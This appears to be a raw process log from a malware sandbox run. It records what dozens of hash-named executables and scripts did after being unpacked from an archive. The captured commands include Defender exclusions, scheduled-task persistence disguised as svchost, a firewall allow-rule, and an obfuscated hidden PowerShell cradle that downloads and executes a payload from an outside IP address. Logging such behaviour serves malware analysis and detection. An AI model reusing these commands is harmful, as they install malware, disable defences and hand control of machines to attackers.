Key opened \REGISTRY\USER\S-1-5-21-2474409663-2236862430-1045297337-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\2023-09-04.zip

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\2023-09-04\" -spe -an -ai#7zMap15470:78:7zEvent15735

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Desktop\2023-09-04\0af4b2f2226ca4fa843cec93b45e5b13a717839df876ca60b563e11ba2acb608.pdf"

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=18D2D1E443BEB4D6CDC93A5721843840 --mojo-platform-channel-handle=1776 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=AA4B97FB42B939E214AA17F22777DF34 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=AA4B97FB42B939E214AA17F22777DF34 --renderer-client-id=2 --mojo-platform-channel-handle=1792 --allow-no-sandbox-job /prefetch:1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=C41E2289331639AD6EEE7B6F7EB2B134 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=C41E2289331639AD6EEE7B6F7EB2B134 --renderer-client-id=4 --mojo-platform-channel-handle=2076 --allow-no-sandbox-job /prefetch:1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=44135C589A5A20BFBA9A452488950D0E --mojo-platform-channel-handle=2224 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=59FB5160D26394F31C9BABA9C2CBF396 --mojo-platform-channel-handle=2460 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=89A204ADF40E0B6D332F4745EBFD0971 --mojo-platform-channel-handle=2464 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\Desktop\2023-09-04\0e0e5c2cfdabbea0c06dc0469d2025057d381cbc531d3c7799a88336c33d4132.exe

"C:\Users\Admin\Desktop\2023-09-04\0e0e5c2cfdabbea0c06dc0469d2025057d381cbc531d3c7799a88336c33d4132.exe"

C:\Users\Admin\Desktop\2023-09-04\0e8ce281e417e03f6a428d872d9b0b7997f5063b259f520b51234c16c87dd0e3.exe

"C:\Users\Admin\Desktop\2023-09-04\0e8ce281e417e03f6a428d872d9b0b7997f5063b259f520b51234c16c87dd0e3.exe"

C:\Users\Admin\Desktop\2023-09-04\2b04a8ff2faa3346370bc021df7c81c78a688c00a4e67a1f64580e5a14501bee.exe

"C:\Users\Admin\Desktop\2023-09-04\2b04a8ff2faa3346370bc021df7c81c78a688c00a4e67a1f64580e5a14501bee.exe"

C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe

"C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\yatvoumatyxyebal.exe" "yatvoumatyxyebal.exe" ENABLE

C:\Users\Admin\Desktop\2023-09-04\5e184f6a7be1ee66c1bb770b66cf475c09d7ab4baaf36f9e0203041fc7098717.exe

"C:\Users\Admin\Desktop\2023-09-04\5e184f6a7be1ee66c1bb770b66cf475c09d7ab4baaf36f9e0203041fc7098717.exe"

C:\Users\Admin\Desktop\2023-09-04\06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe

"C:\Users\Admin\Desktop\2023-09-04\06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ipconfig /release

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /release

C:\Users\Admin\Desktop\2023-09-04\6f89a16231002ca16d388f2fee2ad80acca8c9e7e12d5f778881ac352c35dd8a.exe

"C:\Users\Admin\Desktop\2023-09-04\6f89a16231002ca16d388f2fee2ad80acca8c9e7e12d5f778881ac352c35dd8a.exe"

C:\Users\Admin\Desktop\2023-09-04\7c24993316855b8e855a8ea660369bf117784e27a9cf850e3936ff1e19250d8f.exe

"C:\Users\Admin\Desktop\2023-09-04\7c24993316855b8e855a8ea660369bf117784e27a9cf850e3936ff1e19250d8f.exe"

C:\Users\Admin\Desktop\2023-09-04\9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe

"C:\Users\Admin\Desktop\2023-09-04\9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe"

C:\Users\Admin\Desktop\2023-09-04\14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe

"C:\Users\Admin\Desktop\2023-09-04\14eb5c233e173d7d387b37bcec81fa6f3a6a2485e6f6a174f0e72100872aeb66.exe"

C:\Users\Admin\Desktop\2023-09-04\38d0c2cf38e1dcaca20a6d79903a6075d171d2b31c980c4a789965a783b23b49.exe

"C:\Users\Admin\Desktop\2023-09-04\38d0c2cf38e1dcaca20a6d79903a6075d171d2b31c980c4a789965a783b23b49.exe"

C:\Users\Admin\Desktop\2023-09-04\49dedf19d0d69cc9c0247803d3748ccf25b2c17504f6e07c48a84d8515ec1575.exe

"C:\Users\Admin\Desktop\2023-09-04\49dedf19d0d69cc9c0247803d3748ccf25b2c17504f6e07c48a84d8515ec1575.exe"

C:\Users\Admin\Desktop\2023-09-04\38d0c2cf38e1dcaca20a6d79903a6075d171d2b31c980c4a789965a783b23b49.exe

"C:\Users\Admin\Desktop\2023-09-04\38d0c2cf38e1dcaca20a6d79903a6075d171d2b31c980c4a789965a783b23b49.exe"

C:\Windows\SysWOW64\svchost.exe

"svchost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF772.tmp.bat""

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Roaming\svchost.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Roaming\svchost.exe"'

C:\Windows\system32\timeout.exe

timeout 3

C:\Users\Admin\AppData\Roaming\svchost.exe

"C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Windows\SysWOW64\svchost.exe

"C:\Windows\SysWOW64\svchost.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3876 -ip 3876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3876 -s 1416

C:\Windows\SysWOW64\explorer.exe

"explorer.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ipconfig /renew

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /renew

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Users\Admin\Desktop\2023-09-04\06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe

"C:\Users\Admin\Desktop\2023-09-04\06a27adaf5718c110f2b6a709f428a83650fba961460795518a6cfebaea02d0e.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\2023-09-04\9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\pIQwCnkHxxbR.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pIQwCnkHxxbR" /XML "C:\Users\Admin\AppData\Local\Temp\tmp921C.tmp"

C:\Users\Admin\Desktop\2023-09-04\9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe

"C:\Users\Admin\Desktop\2023-09-04\9a9c8c815e41e4173ef0ca4ae518d232bc3dbc5e6e62d565cf52620ab6d0a6fc.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/YimMenu/YimMenu/issues/new/choose

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd45b346f8,0x7ffd45b34708,0x7ffd45b34718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,17803311037409036651,10679173951299461945,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,17803311037409036651,10679173951299461945,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,17803311037409036651,10679173951299461945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2784 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,17803311037409036651,10679173951299461945,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,17803311037409036651,10679173951299461945,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1

C:\Users\Admin\Desktop\2023-09-04\49dedf19d0d69cc9c0247803d3748ccf25b2c17504f6e07c48a84d8515ec1575.exe

"C:\Users\Admin\Desktop\2023-09-04\49dedf19d0d69cc9c0247803d3748ccf25b2c17504f6e07c48a84d8515ec1575.exe"

C:\Users\Admin\Desktop\2023-09-04\56a9c01b92c732b5581d84d366e37339503d8b99f966e99cea6bfcacd73864ec.exe

"C:\Users\Admin\Desktop\2023-09-04\56a9c01b92c732b5581d84d366e37339503d8b99f966e99cea6bfcacd73864ec.exe"

C:\Users\Admin\Desktop\2023-09-04\74bbf54c84c8a59a0f2f99487122908d30a5f04c32f16b633ff09e27a55273d6.exe

"C:\Users\Admin\Desktop\2023-09-04\74bbf54c84c8a59a0f2f99487122908d30a5f04c32f16b633ff09e27a55273d6.exe"

C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe

"C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe"

C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe

"C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe"

C:\Users\Admin\Desktop\2023-09-04\491b9d7756207e0bf6193028df506a3d3a4e2ee433f508cc262b364293b6e795.exe

"C:\Users\Admin\Desktop\2023-09-04\491b9d7756207e0bf6193028df506a3d3a4e2ee433f508cc262b364293b6e795.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

C:\Users\Admin\AppData\Local\Temp\ChromeClose.exe

"C:\Users\Admin\AppData\Local\Temp\ChromeClose.exe"

C:\Windows\SysWOW64\systray.exe

"C:\Windows\SysWOW64\systray.exe"

C:\Users\Admin\Desktop\2023-09-04\689e96c2e6efebbf0cd6c69bf01cd997a4e50bb1adc729d90ca26d49b4387fac.exe

"C:\Users\Admin\Desktop\2023-09-04\689e96c2e6efebbf0cd6c69bf01cd997a4e50bb1adc729d90ca26d49b4387fac.exe"

C:\Windows\SysWOW64\cmd.exe

/c del "C:\Users\Admin\AppData\Local\Temp\ufclwciske.exe"

C:\Users\Admin\Desktop\2023-09-04\7290bd84fb89cb251cef8db17aecf3f433b8ee2641cc2109026c77b519f8452e.exe

"C:\Users\Admin\Desktop\2023-09-04\7290bd84fb89cb251cef8db17aecf3f433b8ee2641cc2109026c77b519f8452e.exe"

C:\Users\Admin\Desktop\2023-09-04\9025cbcf8f758c9c16cf199ecd45576f61b00921701829343a607336b8e9a2cb.exe

"C:\Users\Admin\Desktop\2023-09-04\9025cbcf8f758c9c16cf199ecd45576f61b00921701829343a607336b8e9a2cb.exe"

C:\Users\Admin\Desktop\2023-09-04\9477b580ea937f47e54b9d6b022617c2e508fbed2f74f6ac3ed54c7861bf8b2d.exe

"C:\Users\Admin\Desktop\2023-09-04\9477b580ea937f47e54b9d6b022617c2e508fbed2f74f6ac3ed54c7861bf8b2d.exe"

C:\Users\Admin\Desktop\2023-09-04\9477b580ea937f47e54b9d6b022617c2e508fbed2f74f6ac3ed54c7861bf8b2d.exe

"C:\Users\Admin\Desktop\2023-09-04\9477b580ea937f47e54b9d6b022617c2e508fbed2f74f6ac3ed54c7861bf8b2d.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\eWFNFYkXygiAi.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eWFNFYkXygiAi" /XML "C:\Users\Admin\AppData\Local\Temp\tmpF507.tmp"

C:\Users\Admin\Desktop\2023-09-04\56a9c01b92c732b5581d84d366e37339503d8b99f966e99cea6bfcacd73864ec.exe

"C:\Users\Admin\Desktop\2023-09-04\56a9c01b92c732b5581d84d366e37339503d8b99f966e99cea6bfcacd73864ec.exe"

C:\Users\Admin\Desktop\2023-09-04\9506cdc2e1dcfdbc7b8be00e12b5bd2e4a2f6b10df353bb19f3affaaaaeafd30.exe

"C:\Users\Admin\Desktop\2023-09-04\9506cdc2e1dcfdbc7b8be00e12b5bd2e4a2f6b10df353bb19f3affaaaaeafd30.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\2023-09-04\38348d68f5d74a0babf439107a11206ec804c9358185c08ecb1fddb89c51e1f7.cmd" "

C:\Users\Admin\Desktop\2023-09-04\77939bc55f126f336599f79e2cec371a290be3f17d08ca83344118e97d314f27.exe

"C:\Users\Admin\Desktop\2023-09-04\77939bc55f126f336599f79e2cec371a290be3f17d08ca83344118e97d314f27.exe"

C:\Users\Admin\Desktop\2023-09-04\532021fc0305c2e6744cccbb73a30f64f7e86584b838e64e537d26bd4ba9dc0c.exe

"C:\Users\Admin\Desktop\2023-09-04\532021fc0305c2e6744cccbb73a30f64f7e86584b838e64e537d26bd4ba9dc0c.exe"

C:\Users\Admin\Desktop\2023-09-04\928900f2a698b6a791232f581192418a953064abbe11f6453cb0bdf7eeec26f2.exe

"C:\Users\Admin\Desktop\2023-09-04\928900f2a698b6a791232f581192418a953064abbe11f6453cb0bdf7eeec26f2.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

C:\Users\Admin\Desktop\2023-09-04\3659096c23b68f66ca65f00e41c47a3b0642b48240cd8b92143f8b6dc90ead82.exe

"C:\Users\Admin\Desktop\2023-09-04\3659096c23b68f66ca65f00e41c47a3b0642b48240cd8b92143f8b6dc90ead82.exe"

C:\Users\Admin\AppData\Local\Temp\ChromeClose.exe

"C:\Users\Admin\AppData\Local\Temp\ChromeClose.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2023-09-04\964555913ef321b88a1e52594f8438820230e704dd06f14768fafa9285038af9.wsf"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/=//=//=//=//=//=//=//=//=//=/(''http://51.254.49.49:222/truintobroth/cod.jpg'')'.RePLACe('/=//=//=//=//=//=//=//=//=//=/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ShsyqjjdO.bat" "

C:\Users\Admin\Desktop\2023-09-04\a1528f5de37b949354a3cdd6e72ac966b4a0ec675d7a23b67af482ddcb94616d.exe

"C:\Users\Admin\Desktop\2023-09-04\a1528f5de37b949354a3cdd6e72ac966b4a0ec675d7a23b67af482ddcb94616d.exe"

C:\Users\Admin\Desktop\2023-09-04\a163afbf2a38849f7f9f8f39b17af32425d3d03b95b9a3f0af1af42faa0ab138.exe

"C:\Users\Admin\Desktop\2023-09-04\a163afbf2a38849f7f9f8f39b17af32425d3d03b95b9a3f0af1af42faa0ab138.exe"

C:\Windows\SysWOW64\SndVol.exe

C:\Windows\System32\SndVol.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 988 -ip 988

C:\Users\Admin\Desktop\2023-09-04\af384052c09f33cf47892ced9ac5de9c7a2cda37ae4aa72c08d54068db5b3284.exe

"C:\Users\Admin\Desktop\2023-09-04\af384052c09f33cf47892ced9ac5de9c7a2cda37ae4aa72c08d54068db5b3284.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c mkdir "\\?\C:\Windows "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 988 -s 1844

C:\Users\Admin\Desktop\2023-09-04\b51c0c907444b390504c65e4d688a265f1698e2bcfc8a214ead20ef62f5d685a.exe

"C:\Users\Admin\Desktop\2023-09-04\b51c0c907444b390504c65e4d688a265f1698e2bcfc8a214ead20ef62f5d685a.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ClWWWrRvtgVoLl" /XML "C:\Users\Admin\AppData\Local\Temp\tmp9114.tmp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

